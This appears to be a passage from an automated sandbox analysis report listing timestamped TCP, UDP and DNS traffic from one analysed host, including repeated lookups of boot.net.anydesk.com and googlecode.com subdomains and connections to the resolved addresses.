                                                                                                                                                                                Jul 16, 2022 23:58:07.128427982 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.155247927 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.155361891 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.158910990 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.185648918 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.186203957 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.186244011 CEST8049874142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:07.186295033 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.186331034 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.205580950 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:07.205631018 CEST4987480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.585467100 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.612966061 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.615356922 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.679080009 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.708020926 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.708112955 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.708139896 CEST8049875142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:08.708209991 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.901561975 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:08.901603937 CEST4987580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.938952923 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.965555906 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.965656996 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.971801043 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.998300076 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.998584032 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.998608112 CEST8049876142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:10.998658895 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:10.998697996 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:11.038285017 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:11.038321018 CEST4987680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.286077976 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.312597990 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.312722921 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.329263926 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.355767965 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.355820894 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.355838060 CEST8049877142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:12.355911016 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.356359005 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:12.356380939 CEST4987780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.623480082 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.650466919 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.650619030 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.655021906 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.681888103 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.681955099 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.682017088 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.682207108 CEST8049879142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:13.682321072 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.682527065 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:13.682557106 CEST4987980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:14.999378920 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.026340008 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.026479959 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.027226925 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.062947989 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.063011885 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.063050032 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.063118935 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.063162088 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.069087029 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.069154978 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:15.101663113 CEST8049880142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:15.103811026 CEST4988080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.371646881 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.398650885 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.398828030 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.399426937 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.426215887 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.426249981 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.426268101 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.426347971 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.426387072 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.426827908 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.426866055 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.645188093 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.674197912 CEST8049882142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:17.674360037 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.677611113 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.704286098 CEST8049882142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:17.704376936 CEST8049882142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:17.704377890 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.704396963 CEST8049882142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:17.704427958 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.704444885 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.705159903 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:17.705205917 CEST4988280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:18.955218077 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:18.982234001 CEST8049885142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:18.982346058 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:18.986483097 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:19.013293982 CEST8049885142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:19.013350010 CEST8049885142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:19.013370991 CEST8049885142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:19.013537884 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:19.013564110 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:19.016724110 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:19.016819954 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:19.043315887 CEST8049885142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:19.043392897 CEST4988580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.251523972 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.280512094 CEST8049886142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:20.280611038 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.281632900 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.308252096 CEST8049886142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:20.308283091 CEST8049886142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:20.308303118 CEST8049886142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:20.308351994 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.308387995 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.308933020 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.309055090 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:20.335445881 CEST8049886142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:20.335551023 CEST4988680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:21.550750017 CEST4988880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:21.577413082 CEST8049888142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:21.577534914 CEST4988880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:21.579205036 CEST4988880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:21.605804920 CEST8049888142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:21.605839014 CEST8049888142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:21.605854034 CEST8049888142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:21.605902910 CEST4988880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:21.605945110 CEST4988880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:21.606429100 CEST4988880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:21.606482029 CEST4988880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:24.983624935 CEST49889443192.168.2.549.12.130.237
                                                                                                                                                                                Jul 16, 2022 23:58:24.983669043 CEST4434988949.12.130.237192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:24.983748913 CEST49889443192.168.2.549.12.130.237
                                                                                                                                                                                Jul 16, 2022 23:58:24.985238075 CEST49889443192.168.2.549.12.130.237
                                                                                                                                                                                Jul 16, 2022 23:58:24.985266924 CEST4434988949.12.130.237192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.043251991 CEST4434988949.12.130.237192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.043342113 CEST49889443192.168.2.549.12.130.237
                                                                                                                                                                                Jul 16, 2022 23:58:25.044338942 CEST49889443192.168.2.549.12.130.237
                                                                                                                                                                                Jul 16, 2022 23:58:25.044351101 CEST4434988949.12.130.237192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.044657946 CEST4434988949.12.130.237192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.044714928 CEST49889443192.168.2.549.12.130.237
                                                                                                                                                                                Jul 16, 2022 23:58:25.355707884 CEST49889443192.168.2.549.12.130.237
                                                                                                                                                                                Jul 16, 2022 23:58:25.408526897 CEST4989080192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:58:25.437520027 CEST804989092.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.438350916 CEST4989080192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:58:25.439656973 CEST4989080192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:58:25.469403982 CEST804989092.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.470498085 CEST804989092.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.470537901 CEST804989092.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.472275019 CEST4989080192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:58:25.494404078 CEST4989080192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:58:25.529814959 CEST804989092.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.529953957 CEST804989092.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.530213118 CEST4989080192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:58:25.820549965 CEST4989080192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:58:25.850384951 CEST804989092.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.850790024 CEST498916568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:58:25.873887062 CEST65684989149.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.874041080 CEST498916568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:58:25.885826111 CEST498916568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:58:25.910002947 CEST65684989149.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.910763979 CEST65684989149.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.910806894 CEST65684989149.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.910862923 CEST498916568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:58:25.926597118 CEST498916568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:58:25.950138092 CEST65684989149.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.950212955 CEST65684989149.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.950320005 CEST498916568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:58:27.550103903 CEST498916568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:58:27.573836088 CEST65684989149.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:27.731281996 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:27.757972956 CEST8049892142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:27.758116961 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:27.798254967 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:27.824928999 CEST8049892142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:27.825057983 CEST8049892142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:27.825083971 CEST8049892142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:27.825130939 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:27.825159073 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:27.828319073 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:27.828355074 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:27.854964972 CEST8049892142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:27.855076075 CEST4989280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:31.372854948 CEST4989680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:31.399841070 CEST8049896142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:31.399960041 CEST4989680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:31.401536942 CEST4989680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:31.428258896 CEST8049896142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:31.428580046 CEST8049896142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:31.428608894 CEST8049896142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:31.428663969 CEST4989680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:31.428690910 CEST4989680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:31.429145098 CEST4989680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:31.429171085 CEST4989680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.051722050 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.078704119 CEST8049899142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:35.078804016 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.080053091 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.122713089 CEST8049899142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:35.122745991 CEST8049899142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:35.122762918 CEST8049899142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:35.122837067 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.122860909 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.136657953 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.136885881 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:35.163775921 CEST8049899142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:35.164938927 CEST4989980192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:39.014349937 CEST4990180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:39.041491032 CEST8049901142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:39.041665077 CEST4990180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:39.042984962 CEST4990180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:39.070127010 CEST8049901142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:39.070574999 CEST8049901142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:39.070605040 CEST8049901142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:39.070700884 CEST4990180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:39.070761919 CEST4990180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:39.071217060 CEST4990180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:39.071247101 CEST4990180192.168.2.5142.250.102.82

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Jul 16, 2022 23:57:19.530715942 CEST6270453192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:19.550043106 CEST53627048.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:19.970247030 CEST5393453192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:19.989499092 CEST53539348.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.577889919 CEST6371253192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:20.598897934 CEST53637128.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:21.983445883 CEST6065853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:22.012310982 CEST53606588.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.309936047 CEST5735253192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:24.335664988 CEST53573528.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.697851896 CEST5233353192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:26.717003107 CEST53523338.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.779398918 CEST4940753192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:26.808068037 CEST53494078.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.516161919 CEST6264853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:27.540215015 CEST53626488.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.021388054 CEST6371853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:28.041414022 CEST53637188.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:44.230241060 CEST6358053192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:44.249377966 CEST53635808.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.227916002 CEST5678453192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:45.250171900 CEST53567848.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.785418987 CEST5955853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:45.804655075 CEST53595588.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:24.959206104 CEST5375953192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:58:24.978725910 CEST53537598.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.372782946 CEST5928553192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:58:25.390219927 CEST53592858.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.826083899 CEST5726253192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:58:25.845954895 CEST53572628.8.8.8192.168.2.5

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                Jul 16, 2022 23:57:19.530715942 CEST192.168.2.58.8.8.80x88bStandard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:19.970247030 CEST192.168.2.58.8.8.80xb157Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:20.577889919 CEST192.168.2.58.8.8.80x6b7bStandard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:21.983445883 CEST192.168.2.58.8.8.80xa848Standard query (0)codecmd01.googlecode.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:24.309936047 CEST192.168.2.58.8.8.80x7b3cStandard query (0)codecmd02.googlecode.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:26.697851896 CEST192.168.2.58.8.8.80x5962Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:26.779398918 CEST192.168.2.58.8.8.80x433Standard query (0)codecmd03.googlecode.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:27.516161919 CEST192.168.2.58.8.8.80xd62aStandard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:28.021388054 CEST192.168.2.58.8.8.80x2050Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:44.230241060 CEST192.168.2.58.8.8.80x2ef4Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:45.227916002 CEST192.168.2.58.8.8.80x2d25Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:45.785418987 CEST192.168.2.58.8.8.80xd638Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:58:24.959206104 CEST192.168.2.58.8.8.80x86c5Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:58:25.372782946 CEST192.168.2.58.8.8.80x84b8Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:58:25.826083899 CEST192.168.2.58.8.8.80x970fStandard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                Jul 16, 2022 23:57:19.550043106 CEST8.8.8.8192.168.2.50x88bNo error (0)boot.net.anydesk.com185.229.191.39A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:19.989499092 CEST8.8.8.8192.168.2.50xb157No error (0)boot.net.anydesk.com49.12.130.236A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:20.598897934 CEST8.8.8.8192.168.2.50x6b7bNo error (0)boot.net.anydesk.com92.223.88.41A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:22.012310982 CEST8.8.8.8192.168.2.50xa848No error (0)codecmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:22.012310982 CEST8.8.8.8192.168.2.50xa848No error (0)googlecode.l.googleusercontent.com142.250.102.82A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:24.335664988 CEST8.8.8.8192.168.2.50x7b3cNo error (0)codecmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:24.335664988 CEST8.8.8.8192.168.2.50x7b3cNo error (0)googlecode.l.googleusercontent.com142.250.102.82A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:26.717003107 CEST8.8.8.8192.168.2.50x5962No error (0)boot.net.anydesk.com49.12.130.236A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:26.808068037 CEST8.8.8.8192.168.2.50x433No error (0)codecmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
